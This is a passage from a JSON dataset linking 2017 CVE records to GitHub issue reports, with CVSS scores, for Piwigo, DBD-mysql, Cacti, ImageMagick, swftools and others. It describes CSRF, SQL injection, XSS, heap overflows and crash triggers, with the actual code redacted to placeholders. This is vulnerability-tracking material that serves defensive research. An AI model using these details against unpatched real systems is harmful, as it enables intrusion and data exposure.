        "Issue_Created_At": "2017-06-28T20:07:56Z",
        "description": "Bug Report: Set administrator private album to public via CSRF & Incorrect Permissions. Proof of Concept APITAG Incorrect Permissions in album ID The public / private tags private means that administrator don\u2019t want others know about album. But there is some way to know what album his hiding. And what the private album\u2019s permalinks is NUMBERTAG By creating album , you could know that album id is in rule NUMBERTAG So you can brute force the album id CODETAG FILETAG FILETAG FILETAG Now is time to republic it. Cross Site Request Forgery in page permalinks & status, visible, comments in page cat_options. There is no pwg_token in the request. So NUMBERTAG set private albums to public CODETAG NUMBERTAG Permalink delete CODETAG NUMBERTAG unlock albums CODETAG Original packet CODETAG Refences: URLTAG Discover By: topsec(Li Zhiqiang)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-10679",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/723",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/723",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2017-06-28T21:54:00Z",
        "description": "when requesting an private id, the permalink is reealed. see URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-10682",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/724",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/724",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2017-06-29T05:19:56Z",
        "description": "Bug Report: SQL injection in page cat_options. Proof of Concent APITAG section status CODETAG FILETAG FILETAG section commnets CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-10788",
        "Issue_Url_old": "https://github.com/perl5-dbi/DBD-mysql/issues/120",
        "Issue_Url_new": "https://github.com/perl5-dbi/dbd-mysql/issues/120",
        "Repo_new": "perl5-dbi/dbd-mysql",
        "Issue_Created_At": "2017-04-13T16:44:13Z",
        "description": "DBD::mysql::st DESTROY failed on APITAG Some tests from DBD::mysql fail on APITAG with different perl versions NUMBERTAG and NUMBERTAG Here there are two different reports: URLTAG URLTAG Both failed with the same errors: CODETAG And this \"beta\" character goes on in very long lines. It is important to note that APITAG is not indeed available on APITAG by default, but APITAG is installed instead: CODETAG I also have reports from this same CPAN Smoker with PASS and UNKNOWN results, but in both cases the tests were skipped.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-10789",
        "Issue_Url_old": "https://github.com/perl5-dbi/DBD-mysql/issues/110",
        "Issue_Url_new": "https://github.com/perl5-dbi/dbd-mysql/issues/110",
        "Repo_new": "perl5-dbi/dbd-mysql",
        "Issue_Created_At": "2017-03-23T11:54:02Z",
        "description": "Handle SSL/TLS correctly. Currently DBD::mysql has these SSL/TLS connections parameters: APITAG After discussion in URLTAG and URLTAG I'm proposing following change how DBD::mysql should process SSL/TLS settings NUMBERTAG Parameter APITAG would change its meaning and after this change SSL/TLS will be required and enforced. If server does not support it then client must not connect to APITAG server and must reject connection NUMBERTAG Introduce new APITAG parameter (default false; SSL/TLS is required and enforced) which could allow to connect to APITAG server without SSL/TLS support when APITAG . This is dangerous as BACKRONYM ( URLTAG or Riddle ( URLTAG can take effect, but in some cases it could be useful (e.g. when it can be ensured that it is not possible to modify any packet between client and server, just there can be passive monitoring of network). Documentation for APITAG must describe this problem and suggest users to not enable this option if they are unsure NUMBERTAG When specified APITAG or APITAG then DBD::mysql must check and verify CA certificate. If validation fails then connection must be rejected NUMBERTAG If DBD::mysql (or underlaying libmysqlclient.so library) decide to reject connection with APITAG server then data (login credentials, authentication negotiation or SQL statements) must not be sent to APITAG server NUMBERTAG If underlaying libmysqlclient.so library is not able to enforce current configuration specified by APITAG parameters then it must reject connection NUMBERTAG If it is possible try to support different versions of libmysqlclient.so library APITAG APITAG NUMBERTAG If not, rather drop SSL support for particular libmysqlclient.so version as providing PATHTAG SSL encryption. CC: MENTIONTAG MENTIONTAG MENTIONTAG Please review my changes and if something is missing or incorrect let me know.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-10789",
        "Issue_Url_old": "https://github.com/perl5-dbi/DBD-mysql/issues/140",
        "Issue_Url_new": "https://github.com/perl5-dbi/dbd-mysql/issues/140",
        "Repo_new": "perl5-dbi/dbd-mysql",
        "Issue_Created_At": "2017-07-01T18:14:10Z",
        "description": "CVETAG : mysql_ssl NUMBERTAG does not enforce encryption. DBD::mysql connects to APITAG server without SSL encryption even when APITAG is set together with APITAG certificate. Test case: CODETAG Related to URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-10795",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/467",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/467",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2017-06-07T03:31:38Z",
        "description": "Stored Cross site Scripting in PATHTAG Hi, I found a stored cross site scripting vulnerability in PATHTAG . And i also tested it on new develop version , it is vulnerable too. The POC is show below. Version : develop version 'commit bc6ed NUMBERTAG URLTAG FILETAG When the other user access the blog ,the script code will be excuted FILETAG E Mail: EMAILTAG Discovered by: Huawei Weiran Labs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-10803",
        "Issue_Url_old": "https://github.com/odoo/odoo/issues/17898",
        "Issue_Url_new": "https://github.com/odoo/odoo/issues/17898",
        "Repo_new": "odoo/odoo",
        "Issue_Created_At": "2017-06-28T21:57:57Z",
        "description": "reserved .",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.9,
        "exploitabilityScore": 0.6
    },
    {
        "CVE_ID": "CVE-2017-10804",
        "Issue_Url_old": "https://github.com/psycopg/psycopg2/issues/420",
        "Issue_Url_new": "https://github.com/psycopg/psycopg2/issues/420",
        "Repo_new": "psycopg/psycopg2",
        "Issue_Created_At": "2016-03-30T19:36:22Z",
        "description": "Strings with NUL bytes are silently truncated in bound parameters. Minimal repro: CODETAG This prints out APITAG , which is neither what I tried to insert nor what I tried to query for, which came as a surprise to me! I would have expected some kind of exception to be thrown. This has the potential to cause security flaws if a developer assumes that the string being queried/inserted has passed validation because the query worked.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-10804",
        "Issue_Url_old": "https://github.com/odoo/odoo/issues/17914",
        "Issue_Url_new": "https://github.com/odoo/odoo/issues/17914",
        "Repo_new": "odoo/odoo",
        "Issue_Created_At": "2017-06-29T11:56:01Z",
        "description": "reserved .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-10805",
        "Issue_Url_old": "https://github.com/odoo/odoo/issues/17921",
        "Issue_Url_new": "https://github.com/odoo/odoo/issues/17921",
        "Repo_new": "odoo/odoo",
        "Issue_Created_At": "2017-06-29T15:21:47Z",
        "description": "reserved .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-10869",
        "Issue_Url_old": "https://github.com/h2o/h2o/issues/1460",
        "Issue_Url_new": "https://github.com/h2o/h2o/issues/1460",
        "Repo_new": "h2o/h2o",
        "Issue_Created_At": "2017-10-18T06:17:40Z",
        "description": "test.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-10872",
        "Issue_Url_old": "https://github.com/h2o/h2o/issues/1543",
        "Issue_Url_new": "https://github.com/h2o/h2o/issues/1543",
        "Repo_new": "h2o/h2o",
        "Issue_Created_At": "2017-12-14T07:08:11Z",
        "description": "test.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-10908",
        "Issue_Url_old": "https://github.com/h2o/h2o/issues/1544",
        "Issue_Url_new": "https://github.com/h2o/h2o/issues/1544",
        "Repo_new": "h2o/h2o",
        "Issue_Created_At": "2017-12-14T07:13:53Z",
        "description": "test.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-10928",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/539",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/539",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-04T16:34:09Z",
        "description": "Heap buffer overflow of identify&convert. APITAG NUMBERTAG APITAG APITAG APITAG build instructions: APITAG when identify or convert MNG file, imagemagick will cause a heap buffer overflow > APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG df0 at pc NUMBERTAG f NUMBERTAG bfe NUMBERTAG a7 bp NUMBERTAG ffdd3a NUMBERTAG b NUMBERTAG sp NUMBERTAG ffdd3a NUMBERTAG b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG df0 thread T NUMBERTAG f NUMBERTAG bfe NUMBERTAG a6 in APITAG APITAG NUMBERTAG f NUMBERTAG c1a NUMBERTAG e in APITAG APITAG NUMBERTAG f NUMBERTAG c1a NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG efdcd0 in APITAG ( PATHTAG NUMBERTAG f NUMBERTAG f0e NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG f0f NUMBERTAG a in APITAG ( PATHTAG NUMBERTAG f NUMBERTAG c1acb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG bd NUMBERTAG c4f in APITAG APITAG NUMBERTAG f NUMBERTAG bfdde NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG bd NUMBERTAG c in APITAG APITAG NUMBERTAG f NUMBERTAG bd NUMBERTAG a9 in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG a2a in APITAG APITAG NUMBERTAG f NUMBERTAG b7a8c7a in APITAG APITAG NUMBERTAG a in APITAG APITAG NUMBERTAG be in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c8 in _start ( PATHTAG ) The vulnerability is caused when identify MNG image, which happens in function APITAG APITAG function APITAG is called by APITAG APITAG Here is the critical code of mng_get_long and its call code: ERRORTAG The reason of this heap buffer overflow is when p buffer has no matched \u2018(\u2018 \u2018)\u2019characters, the POC\u2019s buffer p here is \u201c\"trix( APITAG caused the heap buffer overflow read until next NUMBERTAG matched. It is possible to disclosing some critical data, such as heap chunk data and even other applications\u2019 private data. I am not sure whether it can be exploited to achieve code execution, maybe it is possible. Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-10929",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/7855",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7855",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-07-03T18:50:01Z",
        "description": "Heap buffer overflow in APITAG Heap buffer overflow in APITAG Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-10970",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/838",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/838",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2017-07-05T09:05:12Z",
        "description": "Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG allows remote anonymous users to inject arbitrary web script or HTML via the id parameter. eg: APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.5,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-10976",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/28",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/28",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-11T14:12:37Z",
        "description": "ttftool APITAG memcpy overflow. Crash : URLTAG url Trigger : ./ttftool swftools/ttf2swf_crash_memcpy Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-10995",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/538",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/538",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-04T16:32:12Z",
        "description": "imagemagick identify&convert heap buffer overflow . APITAG NUMBERTAG APITAG build instructions: APITAG when identify or convert MNG file, imagemagick will cause a heap buffer overflow > APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c5a at pc NUMBERTAG fee NUMBERTAG dfb7d bp NUMBERTAG ffeba NUMBERTAG b0 sp NUMBERTAG ffeba NUMBERTAG a0 READ of size NUMBERTAG at NUMBERTAG c5a thread T NUMBERTAG fee NUMBERTAG dfb7c in mng_get_long APITAG NUMBERTAG fee NUMBERTAG f NUMBERTAG ad in APITAG APITAG NUMBERTAG fee NUMBERTAG fae NUMBERTAG in APITAG APITAG NUMBERTAG fee NUMBERTAG c4f in APITAG APITAG NUMBERTAG fee NUMBERTAG bee NUMBERTAG in APITAG APITAG NUMBERTAG fee NUMBERTAG c in APITAG APITAG NUMBERTAG fee NUMBERTAG a9 in APITAG APITAG NUMBERTAG fee NUMBERTAG c NUMBERTAG a2a in APITAG APITAG NUMBERTAG fee NUMBERTAG c NUMBERTAG c7a in APITAG APITAG NUMBERTAG a in APITAG APITAG NUMBERTAG be in main APITAG NUMBERTAG fee NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c8 in _start ( PATHTAG ) The vulnerability is caused when identify MNG image, which happens in function mng_get_long APITAG which is called by line NUMBERTAG at coders/png.c. Here is the critical code of mng_get_long and its call code: ERRORTAG CODETAG It is caused by heap buffer overflow, which is caused by a read operation without overflow check. The p buffer is pointer to chunk, its buffer data and length are read from input file, ERRORTAG When setting proper length and repeat value, it is possible to disclosing some critical data, such as heap chunk data and even other applications\u2019 private data. Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11096",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/25",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/25",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-11T14:06:28Z",
        "description": "swfcombine APITAG Null pointer access. Crash : URLTAG url Trigger : ./swfcombine t m G B v z f o /dev/null swftools/swfcombine_ t m G B v z f APITAG Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11097",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/24",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/24",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-11T14:03:58Z",
        "description": "swfc APITAG Null pointer access . Crash : URLTAG url Trigger : ./swfc APITAG Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11098",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/32",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/32",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-11T14:21:21Z",
        "description": "png2swf APITAG access except. Crash : URLTAG url Trigger : ./png2swf r z j NUMBERTAG s NUMBERTAG o /dev/null swftools/png2swf_ r_ z_ j NUMBERTAG s NUMBERTAG APITAG Crash Detail : PATHTAG ./png2swf r z j NUMBERTAG s NUMBERTAG o /dev/null swftools/png2swf_ r_ z_ j NUMBERTAG s NUMBERTAG APITAG ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG fb5e1f NUMBERTAG pc NUMBERTAG a8a bp NUMBERTAG fffffff0 sp NUMBERTAG ffe7e1c NUMBERTAG e0 T NUMBERTAG a NUMBERTAG in png_load ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG in main ( PATHTAG ERRORTAG NUMBERTAG fb5e4dfb NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG png_load NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11099",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/31",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/31",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-11T14:19:07Z",
        "description": "wa NUMBERTAG swf APITAG access except . Crash : URLTAG url Trigger : ./wa NUMBERTAG swf APITAG Crash Detail : PATHTAG ./wa NUMBERTAG swf APITAG ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bp NUMBERTAG ffe0eb NUMBERTAG sp NUMBERTAG ffe0eb NUMBERTAG f NUMBERTAG T NUMBERTAG in wav_convert2mono ( PATHTAG NUMBERTAG a in main ( PATHTAG NUMBERTAG fccd NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG wav_convert2mono NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11100",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/27",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/27",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-11T14:09:51Z",
        "description": "swfextract APITAG Null pointer access. Crash : URLTAG url Trigger : ./swfextract APITAG Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11101",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/26",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/26",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-11T14:07:57Z",
        "description": "swfcombine APITAG Null pointer access. Crash : URLTAG url Trigger : ./swfcombine t m G B v z f o /dev/null swftools/swfcombine_ t m G B v z f APITAG Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11107",
        "Issue_Url_old": "https://github.com/leenooks/phpLDAPadmin/issues/50",
        "Issue_Url_new": "https://github.com/leenooks/phpldapadmin/issues/50",
        "Repo_new": "leenooks/phpldapadmin",
        "Issue_Created_At": "2017-07-08T02:02:33Z",
        "description": "XSS in FILETAG . Hello, Ismail Belkacim reported CVETAG to Ubuntu's bug tracker. He also provided a patch, URLTAG is this an already known issue? Do you know if CVE has already been assigned to this issue? I didn't see fixes like his in the git tree here. Thanks The important part of the patch: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11141",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/469",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/469",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-04T03:33:33Z",
        "description": "memory exhaustion in APITAG APITAG NUMBERTAG magick identify $FILE When identify MAT file, imagemagick will allocate memory to store data in function APITAG in coders\\mat.c, line NUMBERTAG PATHTAG APITAG PATHTAG APITAG will call function APITAG in APITAG line NUMBERTAG PATHTAG APITAG >depth); PATHTAG APITAG will call function APITAG in APITAG line NUMBERTAG PATHTAG APITAG { ... APITAG >columns,image >rows) quantum; // line NUMBERTAG can be controlled ... APITAG //line NUMBERTAG PATHTAG image >columns and image >rows can be controlled, as it is assigned in APITAG NUMBERTAG PATHTAG image >columns = APITAG // can be controlled image >rows = APITAG // can be controlled PATHTAG MATLAB_HDR are diretly from MAT file without checking in APITAG NUMBERTAG PATHTAG if APITAG char ) APITAG NUMBERTAG can be controlled by modify MAT file PATHTAG So, modifying the width and height can cause APITAG to allocate a anysize amount of memory, this may cause a memory exhaustion Reproducer: FILETAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11163",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/847",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/847",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2017-07-10T06:45:04Z",
        "description": "Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG iaotian. EMAILTAG .cn APITAG Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG allows remote authenticated users to inject arbitrary web script or HTML via specially crafted HTTP Referer headers. APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-11166",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/471",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/471",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-04T03:37:12Z",
        "description": "submitted memory exhaustion in APITAG APITAG NUMBERTAG magick identify $FILE When identify XWD file, imagemagick will allocate memory to store pixel in function APITAG in coders\\xwd.c, line NUMBERTAG PATHTAG APITAG ) APITAG colors)); // can be controlled PATHTAG length can be controlled, as it is assigned as follow(line NUMBERTAG PATHTAG length=(size_t) APITAG PATHTAG APITAG are diretly from XWD file without checking( line NUMBERTAG PATHTAG APITAG char ) &header); // can be controlled by modify XWD file PATHTAG header is a instance of struct _xwd_file_header as follow: PATHTAG typedef struct _xwd_file_header { / header_size = APITAG + length of null terminated window name. / CARD NUMBERTAG header_size B NUMBERTAG CARD NUMBERTAG file_version B NUMBERTAG WD_FILE_VERSION above / CARD NUMBERTAG pixmap_format B NUMBERTAG APITAG or APITAG / CARD NUMBERTAG pixmap_depth B NUMBERTAG Pixmap depth / CARD NUMBERTAG pixmap_width B NUMBERTAG Pixmap width / CARD NUMBERTAG pixmap_height B NUMBERTAG Pixmap height / CARD NUMBERTAG offset B NUMBERTAG Bitmap x offset, normally NUMBERTAG CARD NUMBERTAG byte_order B NUMBERTAG of image data: APITAG APITAG / / bitmap_unit applies to bitmaps (depth NUMBERTAG format XY) only. It is the number of bits that each scanline is padded to. / CARD NUMBERTAG bitmap_unit B NUMBERTAG CARD NUMBERTAG bitmap_bit_order B NUMBERTAG bitmaps only: APITAG APITAG / / bitmap_pad applies to pixmaps (non bitmaps) only. It is the number of bits that each scanline is padded to. / CARD NUMBERTAG bitmap_pad B NUMBERTAG CARD NUMBERTAG bits_per_pixel B NUMBERTAG Bits per pixel / / bytes_per_line is pixmap_width padded to bitmap_unit (bitmaps) or bitmap_pad (pixmaps). It is the delta (in bytes) to get to the same x position on an adjacent row. / CARD NUMBERTAG bytes_per_line B NUMBERTAG CARD NUMBERTAG isual_class B NUMBERTAG Class of colormap / CARD NUMBERTAG red_mask B NUMBERTAG Z red mask / CARD NUMBERTAG green_mask B NUMBERTAG Z green mask / CARD NUMBERTAG blue_mask B NUMBERTAG Z blue mask / CARD NUMBERTAG bits_per_rgb B NUMBERTAG Log2 of distinct color values / CARD NUMBERTAG colormap_entries B NUMBERTAG Number of entries in colormap; not used? / CARD NUMBERTAG ncolors B NUMBERTAG Number of APITAG structures / CARD NUMBERTAG window_width B NUMBERTAG Window width / CARD NUMBERTAG window_height B NUMBERTAG Window height / CARD NUMBERTAG window_x B NUMBERTAG Window upper left X coordinate / CARD NUMBERTAG window_y B NUMBERTAG Window upper left Y coordinate / CARD NUMBERTAG window_bdrwidth B NUMBERTAG Window border width / } APITAG PATHTAG So, modifying the ncolors can cause APITAG to allocate a anysize amount of memory, this may cause a memory exhaustion Reproducer: FILETAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11170",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/472",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/472",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-04T06:35:56Z",
